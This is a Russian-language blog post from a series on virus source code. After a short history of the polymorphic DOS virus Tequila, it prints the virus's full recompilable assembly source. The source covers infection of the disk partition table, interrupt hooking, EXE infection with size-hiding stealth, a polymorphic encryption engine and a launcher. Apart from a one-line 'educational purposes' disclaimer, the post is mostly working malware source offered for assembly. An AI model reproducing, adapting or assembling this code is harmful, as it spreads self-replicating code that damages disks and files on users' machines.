E-Tech 

Исходники вирусов. DOS вирус Tequila

sciencestory 0 Comment ,

Полиморфный, резидентный, загрузочный компьютерный вирус Tequila созданный под ОС MS DOS. Зловред заражает загрузочный сектор диска ПК, что позволяет ему получать управление при запуске компьютера. Находится в памяти (является резидентным), заражая исполняемые файлы с расширением .exe (размер инфицированных программ увеличивался на 2,468 байт). При этом не заражает файлы, в названиях которых есть «v» и «sc» (предположительно для избежания «атаки» антивирусов.

Также нашпигован защитными механизмами — полиморфизм, антиотладка, шифрование. После того, как в ОС будет заражено четверть всех программ, компьютерный вирус Tequila «выдает» свое присутвие выводом на консоль сообщение:

 

Welcome to T.TEQUILA's latest production.
Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/Switzerland
Loving thoughts to L.I.N.D.A
  
BEER and TEQUILA forever !
  
Execute: mov ax, FE03 / int 21. Key to go on!

 

Также зловред выводит на экран картинку фрактала Мандельброта: Исходники вирусов. DOS вирус Tequila

 

Программа была создана швейцарским программистом в исследовательских целях. Однако, программа (исходник или зараженный файл) была похищена и «выпущена» на компьютере одного из сотрудников компании, занимающихся разработкой компьютерных программ. В результате в начале 1991 года разразилась эпидемия этого вируса в Европе. После, в 1993 году эпидемия этого зловреда повторилась в Южной Африке.

 

Исходник вируса Tequila

 

! Внимание. Код приводится исключительно в образовательных целях !

 

 

;=============================

; the tequila virus =

; a recompilable =

; dis-assembly =

; specifically designed =

; for assembly to a COM file =

; with the A86 assembler. =

; ++++++++++++++++++ =

; If you desire a "perfect" =

; byte for byte source code =

;match-up, the MASM assembler=

; must be used and the noted =

;instructions must be changed=

; to comply with MASM syntax.=

; In addition, all byte and =

;word pointer references must=

; be changed from B and W to =

; BYTE POINTER and WORD =

; POINTER. =

;=============================

CODE_SEG SEGMENT

ASSUME CS:CODE_SEG, DS:CODE_SEG, ES:CODE_SEG, SS:CODE_SEG

ORG 0100

TEQUILA PROC NEAR

JMP START

DB 000, 000, 000, 000, 000, 000, 000, 0FFH, 0FFH

DB 009, 005, 001H, 010H, 000, 000, 002H, 0FAH, 000, 00CH

DB 00DH, 00AH, 00DH, 00AH

DB "Welcome to T.TEQUILA's latest production.", 00DH, 00AH

DB "Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/"

DB "Switzerland.", 00DH, 00AH

DB "Loving thoughts to L.I.N.D.A", 00DH, 00AH, 00DH, 00AH

DB "BEER and TEQUILA forever !", 00DH, 00AH, 00DH, 00AH

DB "$"

DB "Execute: mov ax, FE03 / int 21. Key to go on!"

PROGRAM_TERMINATION_ROUTINE:

PUSH BP

MOV BP,SP

SUB SP,0CH

PUSH AX

PUSH BX

PUSH CX

PUSH DX

PUSH SI

PUSH DI

PUSH ES

PUSH DS

PUSH CS

POP DS

MOV AX,W[6]

INC AX

JE 0243H ;Masm Mod. Needed

DEC AX

JNE 020DH ;Masm Mod. Needed

DEC W[8] ;Masm Mod. Needed

JNE 0243H ;Masm Mod. Needed

JMP 0246H ;Masm Mod. Needed

MOV AH,02AH

CALL INT_21

MOV SI,CX

MOV CX,W[8]

CMP CL,DL

JNE 022FH ;Masm Mod. Needed

MOV AX,SI

SUB AX,W[6]

MUL B[011H] ;Masm Mod. Needed

ADD AL,DH

ADD CH,3

CMP AL,CH

JAE 0237H ;Masm Mod. Needed

MOV W[6],0FFFFH ;Masm Mod. Needed

JMP 0243H ;Masm Mod. Needed

MOV W[6],0 ;Masm Mod. Needed

MOV W[8],3 ;Masm Mod. Needed

JMP 02DF ;Masm Mod. Needed

MOV BX,0B800H

INT 011

AND AX,030H

CMP AX,030H

JNE 0256H ;Masm Mod. Needed

MOV BX,0B000H

MOV ES,BX

XOR BX,BX

MOV DI,0FD8FH

MOV SI,0FC18H

MOV W[BP-2],SI

MOV W[BP-4],DI

MOV CX,01E

MOV AX,W[BP-2]

IMUL AX

MOV W[BP-8],AX

MOV W[BP-6],DX

MOV AX,W[BP-4]

IMUL AX

MOV W[BP-0C],AX

MOV W[BP-0A],DX

ADD AX,W[BP-8]

ADC DX,W[BP-6]

CMP DX,0F

JAE 02B0 ;Masm Mod. Needed

MOV AX,W[BP-2]

IMUL W[BP-4]

IDIV W[0F] ;Masm Mod. Needed

ADD AX,DI

MOV W[BP-4],AX

MOV AX,W[BP-8]

MOV DX,W[BP-6]

SUB AX,W[BP-0C]

SBB DX,W[BP-0A]

IDIV W[0D] ;Masm Mod. Needed

ADD AX,SI

MOV W[BP-2],AX

LOOP 0269 ;Masm Mod. Needed

INC CX

SHR CL,1

MOV CH,CL

MOV CL,0DB

ES MOV W[BX],CX ;Masm Mod. Needed

INC BX

INC BX

ADD SI,012

CMP SI,01B8

JL 0260 ;Masm Mod. Needed

ADD DI,034

CMP DI,02A3

JL 025D ;Masm Mod. Needed

XOR DI,DI

MOV SI,0BB

MOV CX,02D

CLD

MOVSB

INC DI

LOOP 02D7 ;Masm Mod. Needed

XOR AX,AX

INT 016

POP DS

POP ES

POP DI

POP SI

POP DX

POP CX

POP BX

POP AX

MOV SP,BP

POP BP

RET

PRINT_MESSAGE:

PUSH DX

PUSH DS

PUSH CS

POP DS

MOV AH,9

MOV DX,012

CALL INT_21

POP DS

POP DX

RET

NEW_PARTITION_TABLE:

CLI

XOR BX,BX

MOV DS,BX

MOV SS,BX

MOV SP,07C00

STI

XOR DI,DI

SUB W[0413],3 ;Masm Mod. Needed

INT 012

MOV CL,6

SHL AX,CL

MOV ES,AX

PUSH ES

MOV AX,022A

PUSH AX

MOV AX,0205

MOV CX,W[07C30]

INC CX

MOV DX,W[07C32]

INT 013

RETF

DB 002, 0FE

DB 04C, 0E9

DB 080, 004

PUSH CS

POP DS

XOR AX,AX

MOV ES,AX

MOV BX,07C00

PUSH ES

PUSH BX

MOV AX,0201

MOV CX,W[0226]

MOV DX,W[0228]

INT 013

PUSH CS

POP ES

CLD

MOV SI,0409

MOV DI,09BE

MOV CX,046

REP MOVSB

MOV SI,091B

MOV DI,0A04

MOV CX,045

REP MOVSB

CLI

XOR AX,AX

MOV ES,AX

ES LES BX,[070] ;Masm Mod. Needed

MOV W[09B0],BX ;Masm Mod. Needed

MOV W[09B2],ES ;Masm Mod. Needed

MOV ES,AX

ES LES BX,[084] ;Masm Mod. Needed

MOV W[09B4],BX ;Masm Mod. Needed

MOV W[09B6],ES ;Masm Mod. Needed

MOV ES,AX

ES MOV W[070],044F ;Masm Mod. Needed

ES MOV W[072],DS ;Masm Mod. Needed

STI

RETF

INSTALL:

CALL NEXT_LINE

NEXT_LINE:

POP SI

SUB SI,028F

PUSH SI

PUSH AX

PUSH ES

PUSH CS

POP DS

MOV AX,ES

ADD W[SI+2],AX

ADD W[SI+4],AX

DEC AX

MOV ES,AX

MOV AX,0FE02

INT 021

CMP AX,01FD

JE NO_PARTITION_INFECTION

ES CMP B[0],05A ;Masm Mod. Needed

JNE NO_PARTITION_INFECTION

ES CMP W[3],0BB ;Masm Mod. Needed

JBE NO_PARTITION_INFECTION

ES MOV AX,W[012] ;Masm Mod. Needed

SUB AX,0BB

MOV ES,AX

XOR DI,DI

MOV CX,09A4

CLD

REP MOVSB

PUSH ES

POP DS

CALL INFECT_PARTITION_TABLE

NO_PARTITION_INFECTION:

POP ES

POP AX

PUSH ES

POP DS

POP SI

CS MOV SS,W[SI+4] ;Masm Mod. Needed

CHAIN_TO_THE_HOST_FILE:

CS JMP D[SI] ;Masm Mod. Needed

INFECT_PARTITION_TABLE:

MOV AH,02A

INT 021

MOV W[6],CX ;Masm Mod. Needed

MOV W[8],DX ;Masm Mod. Needed

MOV AH,052

INT 021

ES MOV AX,W[BX-2] ;Masm Mod. Needed

MOV W[03E8],AX ;Masm Mod. Needed

MOV AX,03513

INT 021

MOV W[09A0],BX ;Masm Mod. Needed

MOV W[09A2],ES ;Masm Mod. Needed

MOV AX,03501

INT 021

MOV SI,BX

MOV DI,ES

MOV AX,02501

MOV DX,03DA

INT 021

MOV B[0A],0 ;Masm Mod. Needed

PUSHF

POP AX

OR AX,0100

PUSH AX

POPF

MOV AX,0201

MOV BX,09A4

MOV CX,1

MOV DX,080

PUSH DS

POP ES

PUSHF

CALL D[09A0] ;Masm Mod. Needed

PUSHF

POP AX

AND AX,0FEFF

PUSH AX

POPF

PUSHF

MOV AX,02501

MOV DX,SI

MOV DS,DI

INT 021

POPF

JAE 0450 ;Masm Mod. Needed

JMP RET ;Masm Mod. Needed

PUSH ES

POP DS

CMP W[BX+02E],0FE02

JNE 045C ;Masm Mod. Needed

JMP RET ;Masm Mod. Needed

ADD BX,01BE

MOV CX,4

MOV AL,B[BX+4]

CMP AL,4

JE 0479 ;Masm Mod. Needed

CMP AL,6

JE 0479 ;Masm Mod. Needed

CMP AL,1

JE 0479 ;Masm Mod. Needed

ADD BX,010

LOOP 0463 ;Masm Mod. Needed

JMP SHORT RET ;Masm Mod. Needed

MOV DL,080

MOV DH,B[BX+5]

MOV W[0228],DX ;Masm Mod. Needed

MOV AX,W[BX+6]

MOV CX,AX

MOV SI,6

AND AX,03F

CMP AX,SI

JBE RET ;Masm Mod. Needed

SUB CX,SI

MOV DI,BX

INC CX

MOV W[0226],CX ;Masm Mod. Needed

MOV AX,0301

MOV BX,09A4

PUSHF

CALL D[09A0] ;Masm Mod. Needed

JB RET ;Masm Mod. Needed

DEC CX

MOV W[DI+6],CX

INC CX

SUB W[DI+0C],SI

SBB W[DI+0E],0

MOV AX,0305

MOV BX,0

INC CX

PUSHF

CALL D[09A0] ;Masm Mod. Needed

JB RET ;Masm Mod. Needed

MOV SI,01F6

MOV DI,09A4

MOV CX,034

CLD

REP MOVSB

MOV AX,0301

MOV BX,09A4

MOV CX,1

XOR DH,DH

PUSHF

CALL D[09A0] ;Masm Mod. Needed

RET

NEW_INTERRUPT_ONE:

PUSH BP

MOV BP,SP

CS CMP B[0A],1 ;Masm Mod. Needed

JE 0506 ;Masm Mod. Needed

CMP W[BP+4],09B4

JA 050B ;Masm Mod. Needed

PUSH AX

PUSH ES

LES AX,[BP+2]

CS MOV W[09A0],AX ;Masm Mod. Needed

CS MOV W[09A2],ES ;Masm Mod. Needed

CS MOV B[0A],1

POP ES

POP AX

AND W[BP+6],0FEFF

POP BP

IRET

NEW_INTERRUPT_13:

CMP CX,1

JNE 054E ;Masm Mod. Needed

CMP DX,080

JNE 054E ;Masm Mod. Needed

CMP AH,3

JA 054E ;Masm Mod. Needed

CMP AH,2

JB 054E ;Masm Mod. Needed

PUSH CX

PUSH DX

DEC AL

JE 0537 ;Masm Mod. Needed

PUSH AX

PUSH BX

ADD BX,0200

INC CX

PUSHF

CS CALL D[09A0] ;Masm Mod. Needed

POP BX

POP AX

MOV AL,1

CS MOV CX,W[0226] ;Masm Mod. Needed

CS MOV DX,W[0228] ;Masm Mod. Needed

PUSHF

CS CALL D[09A0] ;Masm Mod. Needed

POP DX

POP CX

RETF 2

CS JMP D[09A0] ;Masm Mod. Needed

NEW_TIMER_TICK_INTERRUPT:

PUSH AX

PUSH BX

PUSH ES

PUSH DS

XOR AX,AX

MOV ES,AX

PUSH CS

POP DS

ES LES BX,[084] ;Masm Mod. Needed

MOV AX,ES

CMP AX,0800

JA 05B0 ;Masm Mod. Needed

CMP AX,W[09B6]

JNE 0575 ;Masm Mod. Needed

CMP BX,W[09B4]

JE 05B0 ;Masm Mod. Needed

MOV W[09B4],BX ;Masm Mod. Needed

MOV W[09B6],ES ;Masm Mod. Needed

XOR AX,AX

MOV DS,AX

CS LES BX,[09B0] ;Masm Mod. Needed

MOV W[070],BX ;Masm Mod. Needed

MOV W[072],ES ;Masm Mod. Needed

LES BX,[04C] ;Masm Mod. Needed

CS MOV W[09A0],BX ;Masm Mod. Needed

CS MOV W[09A2],ES ;Masm Mod. Needed

MOV W[04C],09BE ;Masm Mod. Needed

MOV W[04E],CS ;Masm Mod. Needed

MOV W[084],04B1 ;Masm Mod. Needed

MOV W[086],CS ;Masm Mod. Needed

POP DS

POP ES

POP BX

POP AX

IRET

INT_21_INTERCEPT:

CMP AH,011

JB CHECK_FOR_HANDLE

CMP AH,012

JA CHECK_FOR_HANDLE

CALL ADJUST_FCB_MATCHES

RETF 2

CHECK_FOR_HANDLE:

CMP AH,04E

JB CHECK_FOR_PREVIOUS_INSTALLATION

CMP AH,04F

JA CHECK_FOR_PREVIOUS_INSTALLATION

CALL ADJUST_HANDLE_MATCHES

RETF 2

CHECK_FOR_PREVIOUS_INSTALLATION:

CMP AX,0FE02

JNE CHECK_FOR_MESSAGE_PRINT

NOT AX

IRET

CHECK_FOR_MESSAGE_PRINT:

CMP AX,0FE03

JNE CHECK_FOR_EXECUTE

CS CMP W[6],0 ;Masm Mod. Needed

JNE CHAIN_TO_TRUE_INT_21

CALL PRINT_MESSAGE

IRET

CHECK_FOR_EXECUTE:

CMP AX,04B00

JE SET_STACK

CMP AH,04C

JNE CHAIN_TO_TRUE_INT_21

SET_STACK:

CS MOV W[09A6],SP ;Masm Mod. Needed

CS MOV W[09A8],SS ;Masm Mod. Needed

CLI

PUSH CS

POP SS

MOV SP,0AE5

STI

CMP AH,04C

JNE TO_AN_INFECTION

CALL PROGRAM_TERMINATION_ROUTINE

JMP SHORT NO_INFECTION

TO_AN_INFECTION:

CALL INFECT_THE_FILE

NO_INFECTION:

CLI

CS MOV SS,W[09A8] ;Masm Mod. Needed

CS MOV SP,W[09A6] ;Masm Mod. Needed

STI

JMP SHORT CHAIN_TO_TRUE_INT_21

CHAIN_TO_TRUE_INT_21:

CS INC W[09BC] ;Masm Mod. Needed

CS JMP D[09B4] ;Masm Mod. Needed

NEW_CRITICAL_ERROR_HANDLER:

MOV AL,3

IRET

ADJUST_FCB_MATCHES:

PUSH BX

PUSH ES

PUSH AX

MOV AH,02F

CALL INT_21

POP AX

PUSHF

CS CALL D[09B4] ;Masm Mod. Needed

PUSHF

PUSH AX

CMP AL,0FF

JE 0664 ;Masm Mod. Needed

ES CMP B[BX],0FF ;Masm Mod. Needed

JNE 064F ;Masm Mod. Needed

ADD BX,7

ES MOV AL,B[BX+017] ;Masm Mod. Needed

AND AL,01F

CMP AL,01F

JNE 0664 ;Masm Mod. Needed

ES SUB W[BX+01D],09A4 ;Masm Mod. Needed

ES SBB W[BX+01F],0 ;Masm Mod. Needed

POP AX

POPF

POP ES

POP BX

RET

ADJUST_HANDLE_MATCHES:

PUSH BX

PUSH ES

PUSH AX

MOV AH,02F

CALL INT_21

POP AX

PUSHF

CS CALL D[09B4] ;Masm Mod. Needed

PUSHF

PUSH AX

JB 0691 ;Masm Mod. Needed

ES MOV AL,B[BX+016] ;Masm Mod. Needed

AND AL,01F

CMP AL,01F

JNE 0691 ;Masm Mod. Needed

ES SUB W[BX+01A],09A4 ;Masm Mod. Needed

ES SBB W[BX+01C],0 ;Masm Mod. Needed

POP AX

POPF

POP ES

POP BX

RET

WRITE_TO_THE_FILE:

MOV AH,040

JMP 069C ;Masm Mod. Needed

READ_FROM_THE_FILE:

MOV AH,03F

CALL 06B4 ;Masm Mod. Needed

JB RET ;Masm Mod. Needed

SUB AX,CX

RET

MOVE_TO_END_OF_FILE:

XOR CX,CX

XOR DX,DX

MOV AX,04202

JMP 06B4 ;Masm Mod. Needed

MOVE_TO_BEGINNING_OF_FILE:

XOR CX,CX

XOR DX,DX

MOV AX,04200

CS MOV BX,W[09A4] ;Masm Mod. Needed

INT_21:

CLI

PUSHF

CS CALL D[09B4] ;Masm Mod. Needed

RET

INFECT_THE_FILE:

PUSH AX

PUSH BX

PUSH CX

PUSH DX

PUSH SI

PUSH DI

PUSH ES

PUSH DS

CALL CHECK_LETTERS_IN_FILENAME

JAE GOOD_NAME

JMP BAD_NAME

GOOD_NAME:

PUSH DX

PUSH DS

PUSH CS

POP DS

SAVE_AND_REPLACE_CRITICAL_ERROR_HANDLER:

MOV AX,03524

CALL INT_21

MOV W[09B8],BX ;Masm Mod. Needed

MOV W[09BA],ES ;Masm Mod. Needed

MOV AX,02524

MOV DX,052A

CALL INT_21

POP DS

POP DX

SAVE_AND_REPLACE_FILE_ATTRIBUTE:

MOV AX,04300

CALL INT_21

CS MOV W[09AA],CX ;Masm Mod. Needed

JAE 06FE ;Masm Mod. Needed

JMP RESTORE_CRIT_HANDLER

MOV AX,04301

XOR CX,CX

CALL INT_21

JB 077C ;Masm Mod. Needed

OPEN_FILE_FOR_READ_WRITE:

MOV AX,03D02

CALL INT_21

JB 0771 ;Masm Mod. Needed

PUSH DX

PUSH DS

PUSH CS

POP DS

MOV W[09A4],AX ;Masm Mod. Needed

GET_FILEDATE:

MOV AX,05700

CALL 06B4 ;Masm Mod. Needed

JB 075C ;Masm Mod. Needed

MOV W[09AC],DX ;Masm Mod. Needed

MOV W[09AE],CX ;Masm Mod. Needed

READ_AND_CHECK_EXE_HEADER:

CALL 06AD ;Masm Mod. Needed

MOV DX,0A49

MOV CX,01C

CALL 069A ;Masm Mod. Needed

JB 075C ;Masm Mod. Needed

PUSH DS

POP ES

MOV DI,0E8

MOV CX,020

CMP W[0A49],05A4D ;Masm Mod. Needed

JNE 075C ;Masm Mod. Needed

MOV AX,W[0A5B]

CLD

REPNE SCASW

JNE 0754 ;Masm Mod. Needed

OR W[09AE],01F ;Masm Mod. Needed

JMP 075C ;Masm Mod. Needed

CALL READ_PAST_END_OF_FILE

JB 075C ;Masm Mod. Needed

CALL ENCRYPT_AND_WRITE_TO_FILE

RESTORE_ALTERED_DATE:

MOV AX,05701

MOV DX,W[09AC]

MOV CX,W[09AE]

CALL 06B4 ;Masm Mod. Needed

CLOSE_THE_FILE:

MOV AH,03E

CALL 06B4 ;Masm Mod. Needed

RESTORE_FILE_ATTRIBUTE:

POP DS

POP DX

MOV AX,04301

CS MOV CX,W[09AA] ;Masm Mod. Needed

CALL INT_21

RESTORE_CRIT_HANDLER:

MOV AX,02524

CS LDS DX,[09B8] ;Masm Mod. Needed

CALL INT_21

BAD_NAME:

POP DS

POP ES

POP DI

POP SI

POP DX

POP CX

POP BX

POP AX

RET

CHECK_LETTERS_IN_FILENAME:

PUSH DS

POP ES

MOV DI,DX

MOV CX,-1

XOR AL,AL

CLD

REPNE SCASB

NOT CX

MOV DI,DX

MOV AX,04353

MOV SI,CX

SCASW

JE 07B7 ;Masm Mod. Needed

DEC DI

LOOP 07A5 ;Masm Mod. Needed

MOV CX,SI

MOV DI,DX

MOV AL,056

REPNE SCASB

JE 07B7 ;Masm Mod. Needed

CLC

RET

STC

RET

READ_PAST_END_OF_FILE:

MOV CX,-1

MOV DX,-0A

CALL 06A8 ;Masm Mod. Needed

MOV DX,0A65

MOV CX,8

CALL 069A ;Masm Mod. Needed

JB RET ;Masm Mod. Needed

CMP W[0A65],0FDF0 ;Masm Mod. Needed

JNE 07F0 ;Masm Mod. Needed

CMP W[0A67],0AAC5 ;Masm Mod. Needed

JNE 07F0 ;Masm Mod. Needed

MOV CX,-1

MOV DX,-9

CALL 06A8 ;Masm Mod. Needed

MOV DX,0A6B

MOV CX,4

CALL 0696 ;Masm Mod. Needed

RET

CLC

RET

ENCRYPT_AND_WRITE_TO_FILE:

CALL MOVE_TO_END_OF_FILE

MOV SI,AX

MOV DI,DX

MOV BX,0A49

MOV AX,W[BX+4]

MUL W[0D] ;Masm Mod. Needed

SUB AX,SI

SBB DX,DI

JAE 080C ;Masm Mod. Needed

JMP OUT_OF_ENCRYPT

MOV AX,W[BX+8]

MUL W[0B] ;Masm Mod. Needed

SUB SI,AX

SBB DI,DX

MOV AX,W[BX+0E]

MOV W[4],AX ;Masm Mod. Needed

ADD W[4],010 ;Masm Mod. Needed

MUL W[0B] ;Masm Mod. Needed

ADD AX,W[BX+010]

SUB AX,SI

SBB DX,DI

JB 083C ;Masm Mod. Needed

SUB AX,080

SBB DX,0

JB RET ;Masm Mod. Needed

ADD W[BX+0E],09B

MOV AX,W[BX+016]

ADD AX,010

MOV W[2],AX ;Masm Mod. Needed

MOV AX,W[BX+014]

MOV W[0],AX ;Masm Mod. Needed

CALL 06A4 ;Masm Mod. Needed

ADD AX,09A4

ADC DX,0

DIV W[0D] ;Masm Mod. Needed

INC AX

MOV W[0A4D],AX ;Masm Mod. Needed

MOV W[0A4B],DX ;Masm Mod. Needed

MOV DX,DI

MOV AX,SI

DIV W[0B] ;Masm Mod. Needed

MOV W[0A5F],AX ;Masm Mod. Needed

MOV BX,DX

ADD DX,0960

MOV W[0A5D],DX ;Masm Mod. Needed

CALL COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE

JB RET ;Masm Mod. Needed

OR W[09AE],01F ;Masm Mod. Needed

MOV BX,W[09BC]

AND BX,01F

SHL BX,1

MOV AX,W[BX+0E8]

MOV W[0A5B],AX ;Masm Mod. Needed

CALL MOVE_TO_BEGINNING_OF_FILE

MOV CX,01C

MOV DX,0A49

WRITE_THE_NEW_HEADER:

CALL 0696 ;Masm Mod. Needed

OUT_OF_ENCRYPT:

RET

COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE:

PUSH BP

XOR AH,AH

INT 01A

MOV AX,DX

MOV BP,DX

PUSH DS

POP ES

MOV DI,0960

MOV SI,DI

MOV CX,020

CLD

REP STOSW

XOR DX,DX

MOV ES,DX

CALL ENCRYPT_STEP_ONE

CALL ENCRYPT_STEP_TWO

CALL ENCRYPT_STEP_THREE

MOV B[SI],0E9

MOV DI,028C

SUB DI,SI

SUB DI,3

INC SI

MOV W[SI],DI

MOV AX,0A04

CALL AX

POP BP

RET

ENCRYPT_STEP_ONE:

DEC BP

ES TEST B[BP],2 ;Masm Mod. Needed

JNE 08EB ;Masm Mod. Needed

MOV B[SI],0E

INC SI

CALL GARBLER

MOV B[SI],01F

INC SI

CALL GARBLER

RET

MOV W[SI],0CB8C

INC SI

INC SI

CALL GARBLER

MOV W[SI],0DB8E

INC SI

INC SI

CALL GARBLER

RET

ENCRYPT_STEP_TWO:

AND CH,0FE

DEC BP

ES TEST B[BP],2 ;Masm Mod. Needed

JE 0920 ;Masm Mod. Needed

OR CH,1

MOV B[SI],0BE

INC SI

MOV W[SI],BX

INC SI

INC SI

CALL GARBLER

ADD BX,0960

TEST CH,1

JE 0934 ;Masm Mod. Needed

MOV B[SI],0BB

INC SI

MOV W[SI],BX

INC SI

INC SI

CALL GARBLER

ADD BX,0960

TEST CH,1

JE 090C ;Masm Mod. Needed

SUB BX,0960

CALL GARBLER

MOV B[SI],0B9

INC SI

MOV AX,0960

MOV W[SI],AX

INC SI

INC SI

CALL GARBLER

CALL GARBLER

RET

ENCRYPT_STEP_THREE:

MOV AH,014

MOV DH,017

TEST CH,1

JE 0958 ;Masm Mod. Needed

XCHG DH,AH

MOV DI,SI

MOV AL,08A

MOV W[SI],AX

INC SI

INC SI

CALL GARBLER

XOR DL,DL

MOV B[0A39],028 ;Masm Mod. Needed

DEC BP

ES TEST B[BP],2 ;Masm Mod. Needed

JE 0978 ;Masm Mod. Needed

MOV DL,030

MOV B[0A39],DL ;Masm Mod. Needed

MOV W[SI],DX

INC SI

INC SI

MOV W[SI],04346

INC SI

INC SI

CALL GARBLER

MOV AX,0FE81

MOV CL,0BE

TEST CH,1

JE 0993 ;Masm Mod. Needed

MOV AH,0FB

MOV CL,0BB

MOV W[SI],AX

INC SI

INC SI

PUSH BX

ADD BX,040

MOV W[SI],BX

INC SI

INC SI

POP BX

MOV B[SI],072

INC SI

MOV DX,SI

INC SI

CALL GARBLER

MOV B[SI],CL

INC SI

MOV W[SI],BX

INC SI

INC SI

MOV AX,SI

SUB AX,DX

DEC AX

MOV BX,DX

MOV B[BX],AL

CALL GARBLER

CALL GARBLER

MOV B[SI],0E2

INC SI

SUB DI,SI

DEC DI

MOV AX,DI

MOV B[SI],AL

INC SI

CALL GARBLER

RET

GARBLER:

DEC BP

ES TEST B[BP],0F ;Masm Mod. Needed

JE RET ;Masm Mod. Needed

DEC BP

ES MOV AL,B[BP] ;Masm Mod. Needed

TEST AL,2

JE 0A0E ;Masm Mod. Needed

TEST AL,4

JE 09F7 ;Masm Mod. Needed

TEST AL,8

JE 09F1 ;Masm Mod. Needed

MOV W[SI],0C789

INC SI

INC SI

JMP RET ;Masm Mod. Needed

MOV B[SI],090

INC SI

JMP RET ;Masm Mod. Needed

MOV AL,085

DEC BP

ES MOV AH,B[BP] ;Masm Mod. Needed

TEST AH,2

JE 0A05 ;Masm Mod. Needed

DEC AL

OR AH,0C0

MOV W[SI],AX

INC SI

INC SI

JMP RET ;Masm Mod. Needed

DEC BP

ES TEST B[BP],2 ;Masm Mod. Needed

JE 0A1A ;Masm Mod. Needed

MOV AL,039

JMP 09F9 ;Masm Mod. Needed

MOV B[SI],0FC

INC SI

RET

MAKE_THE_DISK_WRITE:

CALL PERFORM_ENCRYPTION_DECRYPTION

MOV AH,040

MOV BX,W[09A4]

MOV DX,0

MOV CX,09A4

PUSHF

CALL D[09B4] ;Masm Mod. Needed

JB 0A37 ;Masm Mod. Needed

SUB AX,CX

PUSHF

CMP B[0A39],028 ;Masm Mod. Needed

JNE 0A44 ;Masm Mod. Needed

MOV B[0A39],0 ;Masm Mod. Needed

CALL PERFORM_ENCRYPTION_DECRYPTION

POPF

RET

PERFORM_ENCRYPTION_DECRYPTION:

MOV BX,0

MOV SI,0960

MOV CX,0960

MOV DL,B[SI]

XOR B[BX],DL

INC SI

INC BX

CMP SI,09A0

JB 0A61 ;Masm Mod. Needed

MOV SI,0960

LOOP 0A52 ;Masm Mod. Needed

RET

THE_FILE_DECRYPTING_ROUTINE:

PUSH CS

POP DS

MOV BX,4

MOV SI,0964

MOV CX,0960

MOV DL,B[SI]

ADD B[BX],DL

INC SI

INC BX

CMP SI,09A4

JB 0A7E ;Masm Mod. Needed

MOV SI,0964

LOOP 0A6F ;Masm Mod. Needed

JMP 0390 ;Masm Mod. Needed

;========== THE FOLLOWING IS NOT PART OF THE VIRUS ========

;========== BUT IS MERELY THE BOOSTER. ========

START:

LEA W[0104],EXIT ;Masm Mod. Needed

MOV W[0106],CS ;Masm Mod. Needed

MOV BX,CS

SUB W[0106],BX ;Masm Mod. Needed

JMP INSTALL

EXIT:

INT 020

TEQUILA ENDP

CODE_SEG ENDS

END TEQUILA
Поделиться в соц сетях

Похожие записи

  1. Пишем вирус и антивирус
  2. Как создать invoke’абельную библиотеку импорта
  3. Ассемблер в Unix
  4. Bat вирус | Бат вирус. Команды
Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии

Есть идеи, замечания, предложения? Воспользуйтесь формой Обратная связь или отправьте сообщение по адресу replay@sciencestory.ru
© 2017 Истории науки. Информация на сайте опубликована в ознакомительных целях может иметь ограничение 18+